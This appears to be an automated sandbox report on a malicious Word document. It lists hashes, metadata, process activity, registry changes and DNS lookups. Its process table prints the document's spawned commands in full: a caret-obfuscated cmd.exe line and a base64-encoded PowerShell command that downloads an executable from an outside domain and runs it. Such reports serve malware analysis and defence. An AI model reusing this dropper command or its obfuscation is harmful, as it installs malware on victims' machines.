| File name: | 2063ab132489ad8c103664bc9b1f6593aac35b7a1cef3008d725dc50c9eb32da |
| Full analysis: | https://app.any.run/tasks/7d3806c5-0731-45c7-8c69-67432353b298 |
| Verdict: | Malicious activity |
| Analysis date: | November 14, 2018, 13:43:57 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Triple-buffered client-server encoding, Subject: Vermont Kamren, Comments: Versatile methodical hub, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Thu Nov 8 06:46:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5: | 051722B518FAEF79C24993798CB627D4 |
| SHA1: | 73ACF6CB0B48949C45BECD25C54B34C4FB9A04D2 |
| SHA256: | 2063AB132489AD8C103664BC9B1F6593AAC35B7A1CEF3008D725DC50C9EB32DA |
| SSDEEP: | 1536:RvjjkUBGW23rWBC1TMP0gCQWVUDbkYkQL7ISdMQ6ZS5kyP2tTP7jC:djjVBGW2KCTBfVUDbkYJXdMHSkLhP7jC |
MALICIOUS
Executes PowerShell scripts
- CMd.eXe (PID: 2952)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 1908)
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 1908)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 2216)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 1908)
Creates files in the user directory
- WINWORD.EXE (PID: 1908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | Triple-buffered client-server encoding |
|---|---|
| Subject: | Vermont Kamren |
| Author: | - |
| Keywords: | - |
| Comments: | Versatile methodical hub |
| Template: | Normal |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:04:25 21:21:00 |
| ModifyDate: | 2018:11:08 06:46:00 |
| Pages: | 1 |
| Words: | - |
| Characters: | 1 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Manager: | - |
| Company: | - |
| Bytes: | 90624 |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 1 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: |
|
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1908 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2063ab132489ad8c103664bc9b1f6593aac35b7a1cef3008d725dc50c9eb32da.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2216 | poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwB1AHYAdQByAGkAbgBlAHMAdABsAC4AYwBvAG0ALwBXAEUAUwAvAGYAYQB0AG8AZwAuAHAAaABwAD8AbAA9AHcAeQBuAGMANwAuAHgAYQBwACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAyADkAMQBiAGUAZgA2ADAALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwAMgA5ADEAYgBlAGYANgAwAC4AZQB4AGUAJwA7ACAARQB4AGkAdAA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMd.eXe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2952 | CMd.eXe /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^1^A^H^Y^A^d^Q^B^y^A^G^k^A^b^g^B^l^A^H^M^A^d^A^B^s^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^X^A^E^U^A^U^w^A^v^A^G^Y^A^Y^Q^B^0^A^G^8^A^Z^w^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^c^A^e^Q^B^u^A^G^M^A^N^w^A^u^A^H^g^A^Y^Q^B^w^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^y^A^D^k^A^M^Q^B^i^A^G^U^A^Z^g^A^2^A^D^A^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^A^g^A^F^M^A^d^A^B^h^A^H^I^A^d^A^A^t^A^F^A^A^c^g^B^v^A^G^M^A^Z^Q^B^z^A^H^M^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^o^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^n^A^F^w^A^M^g^A^5^A^D^E^A^Y^g^B^l^A^G^Y^A^N^g^A^w^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^7^A^C^A^A^R^Q^B^4^A^G^k^A^d^A^A^= | C:\Windows\system32\CMd.eXe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
1 311
Read events
915
Write events
391
Delete events
5
Modification events
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | 6yk |
Value: 36796B0074070000010000000000000000000000 | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1299054607 | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1299054720 | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1299054721 | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 74070000805C2F27207CD40100000000 | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | >zk |
Value: 3E7A6B007407000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | >zk |
Value: 3E7A6B007407000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (1908) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9536.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XUKO4H1MPVVTBSSVKE69.temp | — | |
MD5:— | SHA256:— | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da265.TMP | binary | |
MD5:— | SHA256:— | |||
| 1908 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 1908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$63ab132489ad8c103664bc9b1f6593aac35b7a1cef3008d725dc50c9eb32da.doc | pgc | |
MD5:— | SHA256:— | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
3
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
DNS requests
Domain | IP | Reputation |
|---|---|---|
uvurinestl.com |
| unknown |
dns.msftncsi.com |
| shared |